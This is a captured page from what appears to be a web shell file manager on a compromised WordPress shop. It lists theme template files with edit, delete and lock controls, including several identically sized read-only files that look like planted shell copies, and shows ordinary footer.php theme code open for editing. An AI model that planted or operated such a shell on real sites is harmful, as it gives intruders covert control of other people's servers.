📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
Shop
/
wp-content
/
themes
/
bosmarket
/
templates
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📁
presets
-
0755
🗑️
🔒
📄
searchform.php
0.4 KB
0644
🗑️
⬇️
✏️
🔒
📄
pagination.php
0.59 KB
0644
🗑️
⬇️
✏️
🔒
📄
no-results.php
0.91 KB
0644
🗑️
⬇️
✏️
🔒
📄
index.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
header-style9.php
3.51 KB
0644
🗑️
⬇️
✏️
🔒
📄
header-style8.php
3.05 KB
0644
🗑️
⬇️
✏️
🔒
📄
header-style7.php
3.83 KB
0644
🗑️
⬇️
✏️
🔒
📄
header-style6.php
4.1 KB
0644
🗑️
⬇️
✏️
🔒
📄
header-style5.php
3.23 KB
0644
🗑️
⬇️
✏️
🔒
📄
header-style4.php
2.89 KB
0644
🗑️
⬇️
✏️
🔒
📄
header-style3.php
3.82 KB
0644
🗑️
⬇️
✏️
🔒
📄
header-style1.php
3.85 KB
0644
🗑️
⬇️
✏️
🔒
📄
header-style2.php
3.83 KB
0644
🗑️
⬇️
✏️
🔒
📄
head.php
0.22 KB
0644
🗑️
⬇️
✏️
🔒
📄
footer.php
1.65 KB
0644
🗑️
⬇️
✏️
🔒
📄
error_log
0.52 KB
0644
🗑️
⬇️
✏️
🔒
📄
entry-meta.php
0.54 KB
0644
🗑️
⬇️
✏️
🔒
📄
core.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
content.php
2.56 KB
0644
🗑️
⬇️
✏️
🔒
📄
content-single.php
6.9 KB
0644
🗑️
⬇️
✏️
🔒
📄
content-list.php
5.52 KB
0644
🗑️
⬇️
✏️
🔒
📄
content-grid.php
4.46 KB
0644
🗑️
⬇️
✏️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
comments.php
4.91 KB
0644
🗑️
⬇️
✏️
🔒
📄
admin.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
system.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
Editing: footer.php
<?php $bosmarket_page_footer = ( get_post_meta( get_the_ID(), 'page_footer_style', true ) != '' ) ? get_post_meta( get_the_ID(), 'page_footer_style', true ) : sw_options( 'footer_style' ); $bosmarket_copyright_text = sw_options( 'footer_copyright' ); $bosmarket_copyright_footer = get_post_meta( get_the_ID(), 'copyright_footer_style', true ); $bosmarket_copyright_footer = ( get_post_meta( get_the_ID(), 'copyright_footer_style', true ) != '' ) ? get_post_meta( get_the_ID(), 'copyright_footer_style', true ) : sw_options('copyright_style'); ?> <footer id="footer" class="footer default theme-clearfix"> <!-- Content footer --> <div class="container"> <?php if( $bosmarket_page_footer != '' ) : echo sw_get_the_content_by_id( $bosmarket_page_footer ); endif; ?> </div> <div class="footer-copyright <?php echo esc_attr( $bosmarket_copyright_footer ); ?>"> <div class="container"> <!-- Copyright text --> <?php if (is_active_sidebar('footer-copyright')){ ?> <div class="sidebar-copyright"> <?php dynamic_sidebar('footer-copyright'); ?> </div> <?php } ?> <div class="copyright-text"> <?php if( $bosmarket_copyright_text == '' ) : ?> <p>©<?php echo date_i18n('Y') .' '. esc_html__('WordPress Theme SW Bosmarket. All Rights Reserved. Designed by ','bosmarket'); ?><a class="mysite" href="<?php echo esc_url( 'http://wpthemego.com/' ); ?>"><?php esc_html_e('WPThemeGo.Com','bosmarket');?></a>.</p> <?php else : ?> <?php echo wp_kses( $bosmarket_copyright_text, array( 'a' => array( 'href' => array(), 'title' => array(), 'class' => array() ), 'p' => array() ) ) ; ?> <?php endif; ?> </div> </div> </div> </footer>
💾 Save Changes